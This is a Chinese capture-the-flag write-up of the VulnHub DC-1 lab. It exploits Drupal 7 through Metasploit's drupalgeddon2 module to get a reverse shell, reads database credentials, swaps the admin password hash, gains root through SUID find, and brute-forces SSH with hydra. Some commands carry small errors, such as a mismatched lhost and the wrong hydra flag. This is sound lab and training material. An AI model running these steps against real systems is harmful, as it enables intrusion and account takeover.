靶场信息
靶机下载地址:https://www.vulnhub.com/entry/dc-1-1,292/
网络配置
两个都是设置的仅主机模式,两主机使用同一张网卡在同一个网段
DC-1:192.168.0.128
Kali:192.168.0.52
信息收集
使用arp-scan -l进行主机存活扫描:
arp-scan -l
发现192.168.0.128存活
使用nmap进行更详细的扫描:
nmap -sV -p- 192.168.0.128 -O
可以看到该主机开放的服务,80http和22ssh
访问一下主机开启的http服务:
可以看到该网站是由PHP语言编写的开源内容管理系统Brupal搭建的,并且Brupal版本为7.x
使用acun扫描,发现存在远程代码执行漏洞:
此漏洞威胁等级为高危,攻击者可以利用该漏洞执行恶意代码,导致网站完全被控制,漏洞CVE编号为2018-7600
漏洞利用
打开msf,搜索drupal7的漏洞,看到一个2018的远程执行漏洞,选择这个模块进行攻击:
msf6 > search drupal 7 # 在Metasploit中搜索Drupal 7的相关模块
msf6 > use 1 # 选择要使用的模块
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.0.128 # 设置远程主机的IP地址
rhost => 192.168.0.128
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 192.168.0.25 # 设置本地主机的IP地址
lhost => 192.168.0.25
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run # 运行攻击
meterpreter > # 得到Meterpreter回话,攻击成功
调出shell,进行简单的信息收集
meterpreter > shell # 调出shell
Process 5887 created.
Channel 1 created.
whoami # 显示当前用户的身份
www-data
id # 查看当前用户权限
uid=33(www-data) gid=33(www-data) groups=33(www-data) # 非root权限
ifconfig # 查看网络信息
/bin/sh: 3: ifconfig: not found
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:19:93:26 brd ff:ff:ff:ff:ff:ff
inet 192.168.0.128/24 brd 192.168.0.255 scope global eth0
inet6 fe80::20c:29ff:fe19:9326/64 scope link
valid_lft forever preferred_lft forever
cat /etc/issue # 查看系统内核
Debian GNU/Linux 7 \n \l # 版本为debian GUN linux 7
hostname # 查看主机名
DC-1
cat /etc/group # 查看系统组信息
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
vboxsf:x:103:
mlocate:x:105:
ssh:x:106:
messagebus:x:107:
utempter:x:108:
mysql:x:109:
ssl-cert:x:110:
flag4:x:1001: # 可以看到有一个flag4
使用python中的pty模块构造反弹一个交互式的shell:
python -c 'import pty;pty.spawn("/bin/bash")'
搜索使用find的查找所有文件中带有flag的txt文件,发现了flag1和flag4
www-data@DC-1:/var/www$ find / -name "*flag*.txt"
find / -name "*flag*.txt"
/home/flag4/flag4.txt
/var/www/flag1.txt
/root/thefinalflag.txt
flag1
输入ls -a,也可以到flag1.txt:
www-data@DC-1:/var/www$ ls -a
ls -a
. INSTALL.pgsql.txt UPGRADE.txt install.php sites
.. INSTALL.sqlite.txt authorize.php misc themes
.gitignore INSTALL.txt cron.php modules update.php
.htaccess LICENSE.txt flag1.txt profiles web.config
COPYRIGHT.txt MAINTAINERS.txt includes robots.txt xmlrpc.php
INSTALL.mysql.txt README.txt index.php scripts
使用cat查看该文件:
www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.
# 个好的CMS都需要一个配置文件——您也一样。
flag2
drupal7的目录结构如下:
- sites
- all
- libraries
- modules
- themes
- files
- default
- files
- settings.php
- includes
- misc
- modules
- contrib
- custom
- profiles
- scripts
- themes
- contrib
- custom
默认配置文件是 default/settings.php
使用cat命令查看该文件
www-data@DC-1:/var$ cat /var/www/sites/default/settings.php
cat /var/www/sites/default/settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
# 暴力和字典攻击不是*唯一的方式来获得访问(你将需要访问)。
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
可以看到flag2下还有一段数据库的账号和密码:
'username' => 'dbuser',
'password' => 'R0ck3t',
flag3
尝试使用该账号密码登录数据库,登录成功:
www-data@DC-1:/var$ mysql -udbuser -pR0ck3t
mysql -udbuser -pR0ck3t
mysql>
查看数据库,发现有一个drupaldb表,查看一下:
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.00 sec)
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)
可以看到有一个users表
查看该表,可以看到存在一个admin账号,但是密码是经过hash加密的:
mysql> select * from users;
select * from users;
+-----+----------------------------+---------------------------------------------------------+-----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-----------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+----------------------------+---------------------------------------------------------+-----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-----------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
| 3 | HCL4ppsc4nbuggyRandomValue | $S$D7h0vyKiI59NvjEqLs5E9QjbtKFQaqTFwWRCJv3LuHDZSZXvh9N3 | test@altoromutual.com | | | filtered_html | 1704064061 | 0 | 0 | 0 | Australia/Melbourne | | 0 | test@altoromutual.com | NULL |
| 4 | pHqghUme | $S$DqXdr3C04FKwn5JyNdiFxn3EaX8nwQoENIKN5WfbbSOVn7EtuZZn | testing@example.com | | | filtered_html | 1705493301 | 0 | 0 | 0 | Australia/Melbourne | | 0 | testing@example.com | NULL |
+-----+----------------------------+---------------------------------------------------------+-----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-----------------------+------+
5 rows in set (0.00 sec)
查看一下node表,发现了flag3:
mysql> select * from node;
select * from node;
+-----+------+------+----------+-------+-----+--------+------------+------------+---------+---------+--------+------+-----------+
| nid | vid | type | language | title | uid | status | created | changed | comment | promote | sticky | tnid | translate |
+-----+------+------+----------+-------+-----+--------+------------+------------+---------+---------+--------+------+-----------+
| 1 | 1 | page | und | Main | 2 | 1 | 1550582250 | 1550582250 | 0 | 0 | 0 | 0 | 0 |
| 2 | 2 | page | und | flag3 | 1 | 0 | 1550582412 | 1550583860 | 0 | 0 | 0 | 0 | 0 |
+-----+------+------+----------+-------+-----+--------+------------+------------+---------+---------+--------+------+-----------+
2 rows in set (0.00 sec)
返回去查看scripts,发现一个加密脚本password-hash.sh
www-data@DC-1:/var/www$ cd scripts
cd scripts
www-data@DC-1:/var/www/scripts$ ls -all
ls -all
total 88
drwxr-xr-x 2 www-data www-data 4096 Nov 21 2013 .
drwxr-xr-x 9 www-data www-data 4096 Jan 18 00:48 ..
-rw-r--r-- 1 www-data www-data 569 Nov 21 2013 code-clean.sh
-rw-r--r-- 1 www-data www-data 66 Nov 21 2013 cron-curl.sh
-rw-r--r-- 1 www-data www-data 78 Nov 21 2013 cron-lynx.sh
-rwxr-xr-x 1 www-data www-data 4264 Nov 21 2013 drupal.sh
-rw-r--r-- 1 www-data www-data 2955 Nov 21 2013 dump-database-d6.sh
-rw-r--r-- 1 www-data www-data 2573 Nov 21 2013 dump-database-d7.sh
-rw-r--r-- 1 www-data www-data 6814 Nov 21 2013 generate-d6-content.sh
-rw-r--r-- 1 www-data www-data 10790 Nov 21 2013 generate-d7-content.sh
-rwxr-xr-x 1 www-data www-data 2363 Nov 21 2013 password-hash.sh
-rwxr-xr-x 1 www-data www-data 20523 Nov 21 2013 run-tests.sh
-rw-r--r-- 1 www-data www-data 185 Nov 21 2013 test.script
返回到/www目录,修改密码为admin
www-data@DC-1:/var/www$ php scripts/password-hash.sh admin
php scripts/password-hash.sh admin
password: admin hash: $S$DRNiKKbLDKxKDyw2UfHr0awcE4hwriCHjYV5C.E/iDOLg4PM3voX
返回数据库,尝试更换管理员密码的hash
www-data@DC-1:/var$ mysql -udbuser -pR0ck3t
mysql -udbuser -pR0ck3t
mysql> use drupaldb;
mysql> update users set pass='$S$DRNiKKbLDKxKDyw2UfHr0awcE4hwriCHjYV5C.E/iDOLg4PM3voX' where name='admin';
<0awcE4hwriCHjYV5C.E/iDOLg4PM3voX' where name='admin';
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 0
尝试使用admin/admin登录一下,成功登录:
在content看到了flag3
特殊的PERMS将帮助查找passwd -但是您需要-执行该命令才能知道如何获得阴影中的内容。
flag4 suid提权
前几个操作扫到的flag4,访问该文件看一下:
www-data@DC-1:/var/www$ cd /home/flag4
cd /home/flag4
www-data@DC-1:/home/flag4$ ls -all
ls -all
total 28
drwxr-xr-x 2 flag4 flag4 4096 Feb 19 2019 .
drwxr-xr-x 3 root root 4096 Feb 19 2019 ..
-rw------- 1 flag4 flag4 28 Feb 19 2019 .bash_history
-rw-r--r-- 1 flag4 flag4 220 Feb 19 2019 .bash_logout
-rw-r--r-- 1 flag4 flag4 3392 Feb 19 2019 .bashrc
-rw-r--r-- 1 flag4 flag4 675 Feb 19 2019 .profile
-rw-r--r-- 1 flag4 flag4 125 Feb 19 2019 flag4.txt
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
# 您可以使用相同的方法来查找或访问根目录中的标志吗?可能。但也许没那么容易。也许是这样?
thefinalflag
这是第五个flag,别问我是怎么知道的,因为:
吃了英语不好的亏,我说怎么作者说有五个flag我怎么就找到四个,原来第五个flag不叫flag5…而是叫thefinalflag
这个文件之前和flag1、flag4一起扫出来过,访问一下,发现提示权限不够
# 还有一个thefinalflag.txt,访问,但是提示权限不够
cat /root/thefinalflag.txt
cat: /root/thefinalflag.txt: Permission denied
权限不够那就只能提权了,查看本机中拥有sudi权限的程序文件:
www-data@DC-1:/$ find . -exec /bin/sh \; -quit
find . -exec /bin/sh \; -quit
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# whoami
whoami
root # 提权成功,获得root权限
没有,还有一个thefinalflag.txt,尝试查看一下:
# cat /root/thefinalflag.txt
cat /root/thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
# 做得好! !希望你喜欢这篇文章,并学到了一些新技能。你可以通过推特@DCAU7联系我,让我知道你对这次小旅行的看法
ssh远程登录爆破
ssh是可以访问的,但是不知道密码,使用字典爆破:
┌──(root㉿kali)-[~]
└─# hydra -l flag4 -p /usr/share/john/password.lst 192.168.0.128 ssh -vV -f
密码是orange
ssh flag4@192.168.0.128
orange
8378
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
